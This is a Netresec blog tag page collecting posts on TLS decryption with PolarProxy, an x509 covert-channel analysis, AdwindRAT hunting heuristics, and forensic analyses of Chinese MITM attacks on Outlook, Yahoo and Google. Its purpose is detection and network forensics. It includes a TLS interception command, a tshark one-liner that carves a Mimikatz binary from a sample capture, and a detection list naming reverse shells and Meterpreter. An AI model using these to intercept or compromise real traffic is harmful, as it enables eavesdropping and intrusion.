NETRESEC Network Security Blog - Tag: SSL


PolarProxy Released

I’m very proud to announce the release of PolarProxy today! PolarProxy is a transparent TLS proxy that decrypts and re-encrypts TLS traffic while also generating a PCAP file containing the decrypted traffic.

PolarProxy flow chart

PolarProxy enables you to do lots of things that have previously been impossible, or at least very complex, such as:

  • Analyzing HTTP/2 traffic without an SSLKEYLOGFILE
  • Viewing decrypted HTTPS traffic in real-time using Wireshark
    PolarProxy -p 10443,80,443 -w - | wireshark -i - -k
  • Replaying decrypted traffic to an internal or external interface using tcpreplay
    PolarProxy -p 10443,80,443 -w - | tcpreplay -i eth1 -
  • Forwarding of decrypted traffic to a NIDS (see tcpreplay command above)
  • Extracting DNS queries and replies from DNS-over-TLS (DoT) or DNS-over-HTTPS (DoH) traffic
    PolarProxy -p 853,53 -p 443,80
  • Extracting email traffic from SMTPS, POP3S or IMAPS
    PolarProxy -p 465,25 -p 995,110 -p 993,143

Here is an example PCAP file generated by PolarProxy:
https://www.netresec.com/files/polarproxy-demo.pcap

This capture file contains HTTP, WebSocket and HTTP/2 packets to Mozilla, Google and Twitter that would otherwise have been encrypted with TLS.
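If you want a quick look at the decrypted content without installing anything but Wireshark, the demo capture can be fetched and filtered with tshark. A minimal sketch (a reasonably recent Wireshark/tshark build is assumed; older builds may need a manual “Decode As” to show the HTTP/2 streams):

$ curl -O https://www.netresec.com/files/polarproxy-demo.pcap
$ tshark -r polarproxy-demo.pcap -Y 'http || http2'

The filter simply lists the packets that tshark dissects as cleartext HTTP or HTTP/2, which is what PolarProxy writes to the PCAP file in place of the original TLS records.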

 HTTP/2 traffic from PolarProxy opened in Wireshark
Image: HTTP/2 traffic from PolarProxy opened in Wireshark

Now, head over to our PolarProxy page and try it for yourself (it’s free)!

Posted by Erik Hjelmvik on Friday, 21 June 2019 06:00:00 (UTC/GMT)

Tags: #PCAP #IDS #Wireshark #IMAPS #TLS #SSL

Short URL: https://netresec.com/?b=196571B


Examining an x509 Covert Channel

Jason Reaves gave a talk titled “Malware C2 over x509 certificate exchange” at BSides Springfield 2017, where he demonstrated that the SSL handshake can be abused by malware as a covert command-and-control (C2) channel.

Jason Reaves presenting at BSides Springfield 2017

He got the idea while analyzing the Vawtrak malware after discovering that it read multiple fields in the X.509 certificate provided by the server before proceeding. Jason initially thought these fields were used as a C2 channel, but then realized that Vawtrak performed a variant of certificate pinning in order to discover SSL man-in-the-middle attempts.

Nevertheless, Jason decided to actually implement a proof-of-concept (PoC) that uses the X.509 certificate as a C2 channel. Jason’s code is now available on GitHub along with a PCAP file demonstrating this covert C2 channel. Of course I couldn’t resist having a little look at this PCAP file in NetworkMiner.

The first thing I noticed was that the proof-of-concept PCAP ran the SSL session on TCP 4433, which prevented NetworkMiner from parsing the traffic as SSL. However, I was able to parse the SSL traffic with NetworkMiner Professional just fine thanks to the port-independent-protocol-identification feature (a.k.a Dynamic Port Detection), which made the Pro-version parse TCP 4433 as SSL/TLS.

X.509 certificates extracted from PCAP with NetworkMiner
Image: X.509 certificates extracted from PCAP with NetworkMiner

A “normal” X.509 certificate is usually around 1 kB in size, so certificates that are 11 kB should be considered anomalies. Also, opening one of these .cer files reveals an extremely large value in the Subject Key Identifier field.

X.509 certificate with MZ header in the Subject Key Identifier field

Not only is this field very large, it also starts with the familiar “4D 5A” MZ header sequence.

NetworkMiner additionally parses details from the certificates that it extracts from PCAP files, so the Subject Key Identifier field is actually accessible from within NetworkMiner, as shown in the screenshot below.

Parameters tab in NetworkMiner showing X.509 certificate details

You can also see that NetworkMiner validates the certificate using the local trusted root certificates. Not surprisingly, this certificate is not trusted (certificate valid = FALSE). It would be most unlikely that anyone would manage to include arbitrary data like this in a signed certificate.


Extracting the MZ Binary from the Covert X.509 Channel

Even though NetworkMiner excels at pulling out files from PCAPs, this is definitely an occasion where manual handling is required. Jason’s PoC implementation actually uses a whopping 79 individual certificates in order to transfer this Mimikatz binary, which is 785 kB.

Here’s a tshark one-liner you can use to extract the Mimikatz binary from Jason's example PCAP file.

tshark -r mimikatz_sent.pcap -Y 'ssl.handshake.certificate_length gt 2000' -T fields -e x509ce.SubjectKeyIdentifier -d tcp.port==4433,ssl | tr -d ':\n' | xxd -r -p > mimikatz.exe

Detecting x509 Anomalies

Even though covert channels using X.509 certificates aren’t a “thing” (yet?), it’s still a good idea to think about how this type of covert signaling can be detected. Just looking for large Subject Key Identifier fields is probably too specific, since there are other fields and extensions in X.509 that could also be used to transmit data. A better approach would be to alert on certificates larger than, let’s say, 3kB. Multiple certificates can also be chained together in a single TLS handshake certificate record, so it would also make sense to look for handshake records larger than 8kB (rough estimate).
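A quick way to hunt for such oversized certificates in a capture file is to reuse the same tshark field as in the extraction one-liner above. A minimal sketch, with a hypothetical capture file name and the rough 3kB threshold discussed here (newer Wireshark releases use tls.* rather than ssl.* field names):

$ tshark -r suspect.pcap -Y 'ssl.handshake.certificate_length gt 3000' -T fields -e ip.src -e tcp.srcport -e ssl.handshake.certificate_length

Any output from this command points at TLS servers that send unusually large certificates and thus deserve a closer look.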

Bro IDS logo

This type of anomaly-centric intrusion detection is typically best done using the Bro IDS, which provides easy programmatic access to the X.509 certificate and SSL handshake.

There will be false positives when alerting on large certificates in this manner, which is why I recommend also checking whether or not the certificates have been signed by a trusted root. A certificate that is signed by a trusted root is very unlikely to contain malicious data.
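One way to perform that trust check outside of NetworkMiner is with OpenSSL, run against one of the .cer files that NetworkMiner has extracted to disk (the file names here are hypothetical, and depending on your system you may need to point openssl verify at a CA bundle with -CAfile):

$ openssl x509 -inform DER -in suspect.cer -out suspect.pem
$ openssl verify suspect.pem

A certificate that chains to a trusted root will be reported as OK, while a self-signed or bogus certificate will trigger a verification error.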

Posted by Erik Hjelmvik on Tuesday, 06 February 2018 12:13:00 (UTC/GMT)

Tags: #malware #C2 #SSL #TLS #certificate #NetworkMiner #PCAP #X.509 #PIPI #IDS #tshark

Short URL: https://netresec.com/?b=182E662


Hunting AdwindRAT with SSL Heuristics

An increasing number of malware families employ SSL/TLS encryption in order to evade detection by Network Intrusion Detection Systems (NIDS). In this blog post I’m gonna have a look at Adwind, which is a cross-platform Remote Access Trojan (RAT) that has been using SSL to conceal its traffic for several years. AdwindRAT typically connects SSL sessions to seemingly random TCP ports on the C2 servers. Hence, a heuristic that could potentially be used to hunt for Adwind RAT malware is to look for SSL traffic going to TCP ports that normally don’t use SSL. However, relying on ONLY that heuristic would generate way too many false positives.

Brad Duncan did an interesting writeup about Adwind RAT back in 2015, where he wrote:

I saw the same certificate information used last week, and it continues this week.
  • commonName = assylias
  • organizationName = assylias.Inc
  • countryName = FR
Currently, this may be the best way to identify Adwind-based post-infection traffic. Look for SSL traffic on a non-standard TCP port using that particular certificate.

Unfortunately, Adwind RAT has evolved to use other CN’s in their new certificates, so looking for “assylias.Inc” will not cut it anymore. However, looking for SSL traffic on non-standard TCP ports still holds true for the latest Adwind RAT samples that we’ve analyzed.

The PT Research Attack Detection Team (ADT) sent an email with IDS signatures for detecting AdwindRAT to the Emerging-Sigs mailing list a few days ago, where they wrote:

“We offer one of the ways to detect malicious AdwindRAT software inside the encrypted traffic. Recently, the detection of this malicious program in network traffic is significantly reduced due to encryption. As a result of the research, a stable structure of data fragments was created.”

Not only is it awesome that they were able to detect static patterns in the encrypted data, they also provided 25 PCAP files containing AdwindRAT traffic. I loaded these PCAP files into NetworkMiner Professional in order to have a look at the X.509 certificates. NetworkMiner Professional supports Port-Independent Protocol Identification (PIPI), which means that it will automatically identify the C2 sessions as SSL, regardless of which port is used. It will also automatically extract the X.509 certificates along with any other parameters that can be extracted from the SSL handshake before the session is encrypted.

X.509 certificates extracted from AdwindRAT PCAP by NetworkMiner Image: Files extracted from ADT’s PCAP files that match “Oracle” and “cer”.

In this recent campaign the attackers used X.509 certificates claiming to be from Oracle. The majority of the extracted certificates were exactly 1237 bytes long, so maybe they’re all identical? This is what the first extracted X.509 certificate looks like:

Self-signed Oracle America, Inc. X.509 certificate

The cert claims to be valid for a whopping 100 years!

Self-signed Oracle America, Inc. X.509 certificate

Self-signed, not trusted.

However, after opening a few of the other certificates it's clear that each C2 server is using a unique X.509 certificate. This can be quickly confirmed by opening the parameters tab in NetworkMiner Pro and showing only the Certificate Hash or Subject Key Identifier values.

NetworkMiner Parameters tab showing Certificate Hash values Image: Certificate Hash values found in Adwind RAT’s SSL traffic

I also noted that the CN of the certificates isn’t constant either; these samples use CN’s such as “Oracle America”, “Oracle Tanzania”, “Oracle Arusha Inc.”, “Oracle Leonardo” and “Oracle Heaven”.

The CN field is normally used to specify which domain(s) the certificate is valid for, together with any additional Subject Alternative Name field. However, Adwind RAT’s certificates don’t contain any domain name in the CN field and they don’t have an Alternative Name record. This might very well change in future versions of this piece of malware, but I don’t expect the malware authors to generate a certificate with a CN matching the domain name used by each C2 server. I can therefore use this assumption in order to better hunt for Adwind RAT traffic.

But how do I know what public domain name the C2 server has? One solution is to use passive DNS, i.e. to capture all DNS traffic in order to do passive lookups locally. Another solution is to leverage the fact that the Adwind RAT clients use the Server Name Indication (SNI) when connecting to the C2 servers.
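Here is a hedged sketch of how the SNI values can be pulled out of a capture file with tshark, so that they can be compared against the certificate CN values shown in NetworkMiner (the capture file name is hypothetical):

$ tshark -r adwind.pcap -Y 'ssl.handshake.extensions_server_name' -T fields -e ip.dst -e tcp.dstport -e ssl.handshake.extensions_server_name | sort -u

Each output line gives a server, the port it was contacted on and the domain name that the client put in its Client Hello.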

TLS Server Name (aka SNI) and Subject CN values don’t match for AdwindRAT Image: TLS Server Name (aka SNI) and Subject CN values don’t match for AdwindRAT

TLS Server Name (SNI) with matching Subject CN from Google Image: TLS Server Name (SNI) with matching Subject CN from Google.

My conclusion is therefore that Brad’s recommendations from 2015 are still pretty okay, even for the latest wave of Adwind RAT traffic. However, instead of looking for a fixed CN string I’d prefer to use the following heuristics to hunt for this type of C2 traffic:

  • SSL traffic to non-standard SSL port
  • Self signed X.509 certificate
  • The SNI domain name in the Client Hello message does not match the CN or Subject Alternative Name of the certificate.

These heuristics will match more than just Adwind RAT traffic though. You’ll find that the exact same heuristics will also help identify other pieces of SSL-enabled malware as well as Tor traffic.

Posted by Erik Hjelmvik on Monday, 04 September 2017 19:01:00 (UTC/GMT)

Tags: #NetworkMiner #SSL #TLS #port #PCAP #PIPI #X.509 #certificate #extract

Short URL: https://netresec.com/?b=1798DC3


NetworkMiner 2.2 Released

NetworkMiner 2.2 = Harder Better Faster Stronger

NetworkMiner 2.2 is faster, better and stronger than ever before! The PCAP parsing speed has more than doubled and even more details are now extracted from analyzed packet capture files.

The improved parsing speed of NetworkMiner 2.2 can be enjoyed regardless of whether NetworkMiner is run in Windows or Linux. Additionally, the user interface is more responsive and flickers way less when capture files are being loaded.

User Interface Improvements

The keyword filter available in the Files, Messages, Sessions, DNS and Parameters tabs has been improved so that the rows can now be filtered on a single column of choice by selecting the desired column in a drop-down list. There is also an “Any column” option, which can be used to search for the keyword in all columns.

Keyword drop-down in NetworkMiner's Parameters tab

The Messages tab has also received an additional feature, which allows the filter keyword to be matched against the text in the message body as well as email headers when the “Any column” option is selected. This allows for an efficient analysis of messages (such as emails sent/received through SMTP, POP3 and IMAP as well as IRC messages and some HTTP based messaging platforms), since the messages can be filtered just like in a normal e-mail client.

We have also given up on using local timestamp formats; timestamps are now instead shown using the yyyy-MM-dd HH:mm:ss format with time zone explicitly stated.

Protocol Parsers

NetworkMiner 2.2 comes with a parser for the Remote Desktop Protocol (RDP), which rides on top of COTP and TPKT. The RDP parser is primarily used in order to extract usernames from RDP cookies and show them on the Credentials tab. This new version also comes with better extraction of SMB1 and SMB2 details, such as NTLM SSP usernames.

RDP Cookies extracted with NetworkMiner 2.2

One big change that has been made behind the scenes of NetworkMiner is the move from .NET Framework 2.0 to version 4.0. This move doesn’t require any special measures to be taken for most Microsoft Windows users since the 4.0 Framework is typically already installed on these machines. If you’re running NetworkMiner in Linux, however, you might wanna check out our updated blog post on how to install NetworkMiner in Linux.

We have also added an automatic check for new versions of NetworkMiner, which runs every time the tool is started. This update check can be disabled by adding a --noupdatecheck switch to the command line when starting NetworkMiner.

NetworkMiner.exe --noupdatecheck capturefile.pcap

NetworkMiner Professional

Even though NetworkMiner 2.2 now uses ISO-like time representations, NetworkMiner still has to decide which time zone to use for the timestamps. The default decision has always been to use the same time zone as the local machine, but NetworkMiner Professional now additionally comes with an option that allows the user to select whether to use UTC (as nature intended), the local time zone or some other custom time zone for displaying timestamps. The time zone setting can be found in the “Tools > Settings” menu.

UPDATE: With the release of NetworkMiner 2.3 the default time zone is now UTC unless the user has specifically selected a different time zone.

The Port-Independent-Protocol-Detection (PIPI) feature in NetworkMiner Pro has been improved for more reliable identification of HTTP, SSH, SOCKS, FTP and SSL sessions running on non-standard port numbers.

CASE / JSON-LD Export

We are happy to announce that the professional edition of NetworkMiner 2.2 now has support for exporting extracted details using the Cyber-investigation Analysis Standard Expression (CASE) format, which is a JSON-LD format for digital forensics data. The CASE export is also available in the command line tool NetworkMinerCLI.

We would like to thank Europol for recommending us to implement the CASE export format in their effort to adopt CASE as a standard digital forensic format. Several other companies in the digital forensics field are currently looking into implementing CASE in their tools, including AccessData, Cellebrite, Guidance, Volatility and XRY. We believe the CASE format will become a popular format for exchanging digital forensic data between tools for digital forensics, log correlation and SIEM solutions.

We will, however, still continue supporting and maintaining the CSV and XML export formats in NetworkMiner Professional and NetworkMinerCLI alongside the new CASE format.

Credits

I would like to thank Sebastian Gebhard and Clinton Page for reporting bugs in the Credentials tab and TFTP parsing code that now have been fixed. I would also like to thank Jeff Carrell for providing a capture file that has been used to debug an issue in NetworkMiner’s OpenFlow parser. There are also a couple of users who have suggested new features that have made it into this release of NetworkMiner. Marc Lindike suggested the powerful deep search of extracted messages and Niclas Hirschfeld proposed a new option in the PCAP-over-IP functionality that allows NetworkMiner to receive PCAP data via a remote netcat listener.

Upgrading to Version 2.2

Users who have purchased a license for NetworkMiner Professional 2.x can download a free update to version 2.2 from our customer portal.

Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Tuesday, 22 August 2017 11:37:00 (UTC/GMT)

Tags: #pcap #CASE #PIPI #HTTP #SOCKS #SSL #port #forensics

Short URL: https://netresec.com/?b=17888CB


Port Independent Protocol Detection

Protocol Alphabet Soup by ThousandEyes

Our heavy-duty PCAP analyzer CapLoader comes with a feature called ”Port Independent Protocol Identification”, a.k.a. PIPI (see Richard Bejtlich's PIPI blog post from 2006). Academic research in the Traffic Measurement field often uses the term ”Traffic Classification”, which is similar but not the same thing. Traffic Classification normally groups network traffic in broad classes, such as Email, Web, Chat or VoIP. CapLoader, on the other hand, identifies the actual application layer protocol used in each flow. So instead of classifying a flow as ”VoIP” CapLoader will tell you if the flow carries SIP, Skype, RTP or MGCP traffic. This approach is also known as “Dynamic Protocol Detection”.

Being able to identify application layer protocols without relying on the TCP or UDP port number is crucial when analyzing malicious traffic, such as malware Command-and-Control (C2) communication, covert backdoors and rogue servers, since such communication often uses services on non-standard ports. Some common examples are:

  • Many botnet C2 protocols communicate over port TCP 443, but using a proprietary protocol rather than HTTP over SSL.
  • Backdoors on hacked computers and network devices typically either run a standard service like SSH on a port other than 22 in order to hide.
  • More advanced backdoors use port knocking to run a proprietary C2 protocol on a standard port (SYNful knock runs on TCP 80).

This means that by analyzing network traffic for port-protocol anomalies, like an outgoing TCP connection to TCP 443 that isn't SSL, you can effectively detect intrusions without having IDS signatures for all C2 protocols. This analysis technique is often used when performing Rinse-Repeat Intrusion Detection, which is a blacklist-free approach for identifying intrusions and other forms of malicious network traffic. With CapLoader one can simply apply a BPF filter like “port 443” and scroll through the displayed flows to make sure they all say “SSL” in the Protocol column.
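If you don't have CapLoader at hand, a crude approximation of the same hunt can be made with tshark, by listing servers that receive TCP 443 connections but never see a TLS Client Hello. This is only a rough sketch (the capture file name is hypothetical) and it is nowhere near CapLoader's statistical protocol identification, but it can still surface obvious port-protocol anomalies:

$ tshark -r traffic.pcap -Y 'tcp.dstport==443 && tcp.flags.syn==1 && tcp.flags.ack==0' -T fields -e ip.dst | sort -u > connected.txt
$ tshark -r traffic.pcap -Y 'tcp.dstport==443 && ssl.handshake.type==1' -T fields -e ip.dst | sort -u > clienthello.txt
$ comm -23 connected.txt clienthello.txt

The last command prints the destination IP addresses that were contacted on TCP 443 without any Client Hello ever being sent to them.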

CapLoader detects non-SSL traffic to 1.web-counter.info Image: Miuref/Boaxxe Trojan C2 traffic to "1.web-counter[.]info" on TCP 443 doesn't use SSL (or HTTPS)

Statistical Analysis

CapLoader relies on statistical analysis of each TCP, UDP and SCTP session's behavior in order to compare it to previously computed statistical models for known protocols. These statistical models are generated using a multitude of metrics, such as inter-packet delays, packet sizes and payload data. The port number is, on the other hand, a parameter that is intentionally not used by CapLoader to determine the application layer protocol.

The PIPI/Dynamic Protocol Detection feature in CapLoader has been designed to detect even encrypted and obfuscated binary protocols, such as Tor and Encrypted BitTorrent (MSE). These protocols are designed in order to deceive protocol detection mechanisms, and traditional signature based protocol detection algorithms can't reliably detect them. The statistical approach employed by CapLoader can, on the other hand, actually detect even these highly obfuscated protocols. It is, however, important to note that being a statistical method it will never be 100% accurate. Analysts should therefore not take for granted that a flow is using the protocol stated by CapLoader. There are some situations when it is very difficult to accurately classify an encrypted protocol, such as when the first part of a TCP session is missing in the analyzed data. This can occur when there is an ongoing session that was established before the packet capture was started.


Identified Protocols

The following protocols are currently available for detection in CapLoader's protocol database:

AOL Instant Messenger
BACnet
BitTorrent
BitTorrent Encrypted - MSE
CCCam
CUPS
DAYTIME
DHCP
DHCPv6
Diameter
DirectConnect
DNS
Dockster
DropBox LSP
eDonkey
eDonkey Obfuscated
EtherNet-IP
FTP
Gh0st RAT
Gnutella
Groove LAN DPP
HSRP
HTTP
IMAP
IRC
ISAKMP
iSCSI
JavaRMI
Kelihos
Kerberos
L2TP
LDAP
LLC
Meterpreter
MgCam
MGCP
MikroTik NDP
Modbus TCP
MSN Messenger
MS RPC
MS-SQL
MySQL
NAT-PMP
NetBIOS Datagram Service
NetBIOS Name Service
NetBIOS Session Service
NetFlow
NTP
OsCam
Pcap-over-IP
Poison Ivy RAT
POP3
QUIC
Ramnit
Reverse Shell
RTCP
RTP
RTSP
Shell
SIP
Skype
SLP
SMTP
SNMP
Socks
SopCast P2P
Spotify P2P
Spotify Server
SSH
SSL
Syslog
TeamViewer
TeamViewer UDP
Telnet
Teredo
TFTP
TFTP Data
TPKT
VNC
WS-Discovery
XMPP Jabber
ZeroAccess
Zeus TCP
Zeus UDP

The list of implemented protocols is constantly being increased with new protocols.


PIPI in NetworkMiner

NetworkMiner Logo

NetworkMiner Professional, which is the commercial version of NetworkMiner, also comes with an implementation of our protocol detection mechanism. Even though NetworkMiner Professional doesn't detect as many protocols as CapLoader, the PIPI feature built into NetworkMiner Pro still helps a lot when analyzing HTTP traffic on ports other than 80 or 8080, as well as for reassembling files downloaded from FTP or TFTP servers running on non-standard ports.

 

Posted by Erik Hjelmvik on Tuesday, 06 October 2015 09:05:00 (UTC/GMT)

Tags: #Protocol Identification #CapLoader #VoIP #SIP #RTP #TOR #SSL #PIPI #PCAP #NetworkMiner

Short URL: https://netresec.com/?b=15A1776


Chinese MITM attack on outlook.com

An illustration from supplement to 'Le Petit Journal', 16th January 1898.

We were contacted by GreatFire.org earlier today regarding a new Chinese man-in-the-middle (MITM) attack. This time the perpetrators decrypted traffic between Chinese users and Microsoft's IMAP mail server for outlook.com. As evidence GreatFire.org provided us with a packet capture file, which we have analyzed.

Our conclusion is that this was a real attack on Microsoft's email service. Additionally, the attack is very similar to previous nationwide Chinese attacks on SSL encrypted traffic, such as the attack on Google a few months ago. Details such as email address, email password, email contents, email attachments and contacts may have been compromised in this attack. We do not know the scale of the attack; it could be anything from a fairly targeted attack to a nationwide attack in China. What we do know is that there are several users who have been subjected to the MITM attack and posted screenshots online.

Technical Analysis

Attacked IP Address: 157.56.195.250 (imap-mail.outlook.com)
Attacked Protocol: SSL encryption of IMAPS (TCP 993)
Date of Attack: 2015-01-18
PCAP File: https://www.cloudshark.org/captures/8bf76336e67d

In our technical analysis we first extracted the x509 certificates from the SSL traffic by loading the capture file into NetworkMinerCLI. We then parsed the extracted certificates with OpenSSL.

$ mono /opt/NetworkMinerProfessional_1-6-1/NetworkMinerCLI.exe -r Outlook_MITM_2015-01-18.pcapng
Closing file handles...
84 frames parsed in 0.888754 seconds.
$ ls AssembledFiles/157.56.195.250/TLS_Cert\ -\ TCP\ 993/*.cer
AssembledFiles/157.56.195.250/TLS_Cert - TCP 993/hotmail.com[1].cer
AssembledFiles/157.56.195.250/TLS_Cert - TCP 993/hotmail.com[2].cer
AssembledFiles/157.56.195.250/TLS_Cert - TCP 993/hotmail.com.cer
$ openssl x509 -inform DER -in AssembledFiles/157.56.195.250/TLS_Cert\ -\ TCP\ 993/hotmail.com.cer -noout -issuer -subject -startdate -fingerprint
issuer= /CN=*.hotmail.com
subject= /CN=*.hotmail.com
notBefore=Jan 15 16:00:00 2015 GMT
SHA1 Fingerprint=75:F4:11:59:5F:E9:A2:1A:17:A4:96:7C:7B:66:6E:51:52:79:1A:32

When looking at the timestamps in the capture file we noticed that the SSL server's reply to the 'Client Hello' was very slow; response times varied between 14 and 20 seconds. Under normal circumstances the 'Server Hello' arrives within 0.3 seconds after the 'Client Hello' has been sent.

$ tshark -nr ./Outlook_MITM_2015-01-18.pcapng -Y 'ssl.handshake.type lt 3'
8 9.023876000 10.0.2.15 -> 157.56.195.250 SSL 265 Client Hello
17 26.885504000 157.56.195.250 -> 10.0.2.15 TLSv1 576 Server Hello, Certificate, Server Hello Done
45 101.747755000 10.0.2.15 -> 157.56.195.250 SSL 265 Client Hello
49 116.258483000 157.56.195.250 -> 10.0.2.15 TLSv1 576 Server Hello, Certificate, Server Hello Done
63 116.338420000 10.0.2.15 -> 157.56.195.250 SSL 265 Client Hello
65 136.119127000 157.56.195.250 -> 10.0.2.15 TLSv1 576 Server Hello, Certificate, Server Hello Done
[...]

This slow SSL response is consistent with previous SSL MITM attacks conducted with support of the Great Firewall of China (GFW).
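For reference, the certificate that Microsoft's genuine IMAP server presents can be fetched directly with OpenSSL; the issuer will be a real CA rather than the self-signed “*.hotmail.com” certificate seen above (the exact fingerprint you get today will naturally differ, since certificates are rotated regularly):

$ openssl s_client -connect imap-mail.outlook.com:993 < /dev/null 2>/dev/null | openssl x509 -noout -issuer -subject -fingerprint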

For more details on this attack, please see the Reuters story "After Gmail blocked in China, Microsoft's Outlook hacked" and GreatFire's own blog post "Outlook grim - Chinese authorities attack Microsoft".

Posted by Erik Hjelmvik on Monday, 19 January 2015 22:55:00 (UTC/GMT)

Tags: #Netresec #PCAP #PCAPNG #GFW #MITM #China #Hotmail #IMAP #IMAPS #SSL

Short URL: https://netresec.com/?b=151ACA1


Verifying Chinese MITM of Yahoo

Yahoo Umbrella GreatFire.org sent out a tweet yesterday saying that “Yahoo appears to under Man-in-the-middle attack in China. 3rd case of country-wide MITM, after Google, Github”.

Mashable later ran a story called “China Appears to Attack Yahoo in Latest Censorship of Hong Kong Protests”, where Lorenzo Franceschi-Bicchierai writes:

In what's almost unprecedented, China appears to be targeting Yahoo with what's called a "man-in-the-middle attack." With such an attack, connections to Yahoo.com, which are normally encrypted, would be vulnerable to snooping, and Chinese censors could also block search terms or specific Yahoo links with the goal of preventing Chinese netizens from accessing information about the protests in Hong Kong.

In this blog post we verify that there is an ongoing Man-in-the-Middle (MITM) attack by analyzing two different packet capture files.

Capture Location    Capture Date              Filename           MD5
Wuxi, China         2014-09-30 10:15 (UTC)    Yahoo.pcapng       5633a0cce5955b4418189fe3fd27847d
Zhengzhou, China    2014-09-30 11:35 (UTC)    YahooMITM.pcapng   722ca9b7837416ef2391b48edd20d24e

Both PCAP files were created with Wireshark/dumpcap using a capture filter of “host 202.43.192.109”, which is the IP address that was reported to be MITM'ed by the Great Firewall of China (GFW). This IP address is located in Hong Kong and is used by Yahoo to host www.yahoo.com, hk.yahoo.com etc. for users in this part of Asia.


Time-To-Live (TTL) Analysis

We estimate the distance between the end users and the Yahoo server in Hong Kong to be at least 10 router hops. However, the IP packets coming back to the users have IP TTL values of 58 (Wuxi) and 57 (Zhengzhou). This implies that the MITM is performed somewhere in China, just 6 or 7 router hops away from the users. This is consistent with what we've observed in previous MITM attacks performed by China against GitHub and Google.
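The TTL values are easy to verify straight from the capture files with tshark, for example like this for the Zhengzhou capture listed above:

$ tshark -r YahooMITM.pcapng -Y 'ip.src == 202.43.192.109' -T fields -e ip.ttl | sort | uniq -c

The same command run against Yahoo.pcapng should show TTL 58 instead of 57.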

CapLoader 1.2 Hosts tab with hk.yahoo.com
IMAGE: Hosts tab in CapLoader showing TTL 57 for hk.yahoo.com:443


X.509 Certificate Analysis

We have extracted a X.509 certificate from one of the PcapNG files to a .cer file using NetworkMiner. This SSL certificate is available for download here.

$ openssl x509 -inform DER -in yahoo.com.cer -noout -issuer -subject -startdate -enddate -fingerprint
issuer= /C=cn/O=yahoo.com/CN=yahoo.com
subject= /C=cn/O=yahoo.com/CN=yahoo.com
notBefore=Sep 23 11:30:17 2014 GMT
notAfter=Sep 23 11:30:17 2015 GMT
SHA1 Fingerprint=22:90:C3:11:EA:0F:3F:57:E0:6D:F4:5B:69:8E:18:E8:28:E5:9B:C3

The certificate is a self signed certificate for “yahoo.com”. The fact that the MITM uses a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted.

Some may think it's odd that China can't forge a properly signed certificate for their SSL MITM attack. However, they've used very similar self signed certificates also in their previous MITM attacks against GitHub and Google. The purpose of GFW (a.k.a. “Golden Shield”) is to censor the Internet, so the primary goal with this MITM attack isn't to covertly spy on Chinese Yahoo searches. Regardless if the end users notice the MITM or not, a self signed X.509 cert is enough in order to see what they are searching for and “kill” their connection to Yahoo when queries like “Umbrella Revolution” and “Tiananmen Square Protests” are observed.

Posted by Erik Hjelmvik on Wednesday, 01 October 2014 21:55:00 (UTC/GMT)

Tags: #MITM #GFW #PCAP #PCAPNG #SSL #TLS #China

Short URL: https://netresec.com/?b=14AC5EE


Analysis of Chinese MITM on Google

The Chinese are running a MITM attack on SSL encrypted traffic between Chinese universities and Google. We've performed technical analysis of the attack, on request from GreatFire.org, and can confirm that it is a real SSL MITM against www.google.com and that it is being performed from within China.

We were contacted by GreatFire.org yesterday (September 3) with a request to analyze two packet captures from suspected MITM-attacks before they finalized their blog post. The conclusions from our analysis is now published as part of GreatFire.org's great blog post titled “Authorities launch man-in-the-middle attack on Google”.

In their blog post GreatFire.org write:

From August 28, 2014 reports appeared on Weibo and Google Plus that users in China trying to access google.com and google.com.hk via CERNET, the country’s education network, were receiving warning messages about invalid SSL certificates. The evidence, which we include later in this post, indicates that this was caused by a man-in-the-middle attack.

While the authorities have been blocking access to most things Google since June 4th, they have kept their hands off of CERNET, China’s nationwide education and research network. However, in the lead up to the new school year, the Chinese authorities launched a man-in-the-middle (MITM) attack against Google.

Our network forensic analysis was performed by investigating the following two packet capture files:

Capture Location       Client Netname   Capture Date   Filename             MD5
Peking University      PKU6-CERNET2     Aug 30, 2014   google.com.pcap      aba4b35cb85ed2187a8a7656cd670a93
Chongqing University   CQU6-CERNET2     Sep 1, 2014    google_fake.pcapng   3bf943ea453f9afa5c06b9c126d79557


Client and Server IP addresses

The analyzed capture files contain pure IPv6 traffic (CERNET is an IPv6 network), which made the analysis a bit different than usual. We do not disclose the client IP addresses for privacy reasons, but they both seem legit; one from Peking University (netname PKU6-CERNET2) and the other from Chongqing University (CQU6-CERNET2). Both IP addresses belong to AS23910, named "China Next Generation Internet CERNET2".

PekingUniversityPic6 by galaygobi
Peking University entrance, by galaygobi (Creative Commons Attribution 2.0)

CQUAQUGATE3 by Brooktse
Chongqing University gate, by Brooktse (Creative Commons Attribution-Share Alike 3.0)

The IP addresses received for www.google.com were in both cases also legit, so the MITM wasn't carried out through DNS spoofing. The Peking University client connected to 2607:f8b0:4007:804::1013 (GOOGLE-IPV6 in United States) and the connection from Chongqing University went to 2404:6800:4005:805::1010 (GOOGLE_IPV6_AP-20080930 in Australia).


Time-To-Live (TTL) Analysis

The Time-To-Live (TTL) values received in the IP packets from www.google.com were in both cases 248 or 249 (note: TTL is actually called ”Hop Limit” in IPv6 nomenclature, but we prefer to use the well established term ”TTL” anyway). The highest possible TTL value is 255, which means that the received packets made no more than 6 or 7 router hops before ending up at the client. However, the expected number of router hops between a server on GOOGLE-IPV6 and the client at Peking University is around 14. The low number of router hops is a clear indication of an IP MITM taking place.
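Since this is IPv6 traffic the field to inspect with tshark is the Hop Limit rather than ip.ttl. A quick sanity check of the values coming back from Google in the Chongqing capture could look like this (file name as listed in the table above):

$ tshark -r google_fake.pcapng -Y 'ipv6.src == 2404:6800:4005:805::1010' -T fields -e ipv6.hlim | sort | uniq -c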

CapLoader 1.2, Hosts tab
Image: CapLoader with both capture files loaded, showing TTL values

Here is an IPv6 traceroute from AS25795 in Los Angeles towards the IP address at Peking University (generated with ARP Networks' 4or6.com tool):

#traceroute -6 2001:da8:201:[REDACTED]
 1  2607:f2f8:1600::1 (2607:f2f8:1600::1) 1.636 ms 1.573 ms 1.557 ms
 2  2001:504:13::1a (2001:504:13::1a) 40.381 ms 40.481 ms 40.565 ms
 3  * * *
 4  2001:252:0:302::1 (2001:252:0:302::1) 148.409 ms 148.501 ms 148.595 ms
 5  * * *
 6  2001:252:0:1::1 (2001:252:0:1::1) 148.273 ms 147.620 ms 147.596 ms
 7  pku-bj-v6.cernet2.net (2001:da8:1:1b::2) 147.574 ms 147.619 ms 147.420 ms
 8  2001:da8:1:50d::2 (2001:da8:1:50d::2) 148.582 ms 148.670 ms 148.979 ms
